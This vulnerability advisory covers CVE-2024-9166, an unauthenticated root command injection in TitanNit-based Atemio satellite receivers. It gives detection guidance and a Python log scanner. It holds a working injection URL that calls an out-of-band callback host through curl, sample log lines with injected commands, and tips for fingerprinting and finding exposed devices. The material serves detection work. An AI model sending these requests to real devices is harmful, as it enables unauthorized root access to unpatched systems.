CVE-2024-9166
published 2024-09-26

Priority P267 · critical · 9.3 (CVSS 4.0)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EXPLOIT
EPSS: 1.51% (71.3th percentile)
The device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access.

Affected

1 range
Vendor: atelmo
Product: atemio_am_520_hd_full_hd_satellite_receiver
Version range: <= TitanNit 2.01
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

url: /query?getcommand=&cmd=curl+http://{{interactsh-url}}
path: /query
  • Detect exploitation attempts by monitoring HTTP GET requests to the /query endpoint containing the 'getcommand' parameter, especially combined with a 'cmd' parameter carrying shell commands.
  • Responses from a vulnerable TitanNit Web Control device will contain 'titan.css' in the body; use this as a fingerprint to confirm the target is a TitanNit device.
  • Use FOFA or similar asset-discovery tools to identify exposed TitanNit Web Control instances by searching for the page title 'TitanNit Web Control'.
  • The exploit is unauthenticated (no credentials required) and requires only a single crafted GET request; alert on any external/internet-sourced request to /query?getcommand= on ICS/satellite-receiver devices.
  • The vulnerable parameter is 'getcommand' within the /query endpoint; the injected command is passed via the 'cmd' query parameter. Both parameters must be present in the request for the injection to trigger.
  • Affected product (Atemio AM 520 HD running TitanNit 2.01 and prior) has been discontinued by the vendor with no patch available; no service or support addresses can be contacted.
  • The Nuclei template uses an out-of-band (OAST/interactsh) callback to confirm code execution; detections relying solely on response body may miss blind RCE cases where the command output is not reflected.
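
The request-side check described in the bullets above, as an added example (not code from this page or from any vendor): it scans web or proxy access logs in combined log format and grades each /query?getcommand= request by whether 'cmd' is also present and whether the source is external. The log lines, the RFC 1918 definition of "internal", the severity labels and the case-insensitive matching are assumptions made for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: RFC 1918 ranges count as "internal"; adjust to your network.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Combined/common log format: source ... [time] "METHOD target PROTO"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*"')

# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = """\
203.0.113.7 - - [26/Sep/2024:10:01:02 +0000] "GET /query?getcommand=&cmd=uname+-a HTTP/1.1" 200 12
192.168.1.20 - - [26/Sep/2024:10:02:10 +0000] "GET /query?getcommand=&cmd=uptime HTTP/1.1" 200 40
198.51.100.9 - - [26/Sep/2024:10:03:44 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.9 - - [26/Sep/2024:10:04:00 +0000] "GET /QUERY?GetCommand=&CMD=id HTTP/1.1" 200 9
203.0.113.7 - - [26/Sep/2024:10:05:30 +0000] "GET /query?getcommand= HTTP/1.1" 200 0
"""

def is_external(src):
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:          # hostname or garbage: treat as external
        return True
    return not any(ip in net for net in INTERNAL_NETS)

def classify(line):
    """Return an alert dict for a /query?getcommand= request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, target = m.groups()
    url = urlsplit(target)
    # Case-insensitive matching is a conservative assumption, not a page fact.
    params = {k.lower(): v[0] for k, v in
              parse_qs(url.query, keep_blank_values=True).items()}
    if url.path.lower() != "/query" or "getcommand" not in params:
        return None
    external = is_external(src)
    if "cmd" in params:         # both parameters present: injection shape
        level = "critical" if external else "high"
    else:                       # getcommand alone: probe or malformed attempt
        level = "medium"
    return {"src": src, "level": level, "external": external,
            "cmd": params.get("cmd")}

def scan(log_text):
    return [a for a in map(classify, log_text.splitlines()) if a]
```

Because the check looks only at the request, it also covers the blind case noted above, where the command output is never reflected in the response body.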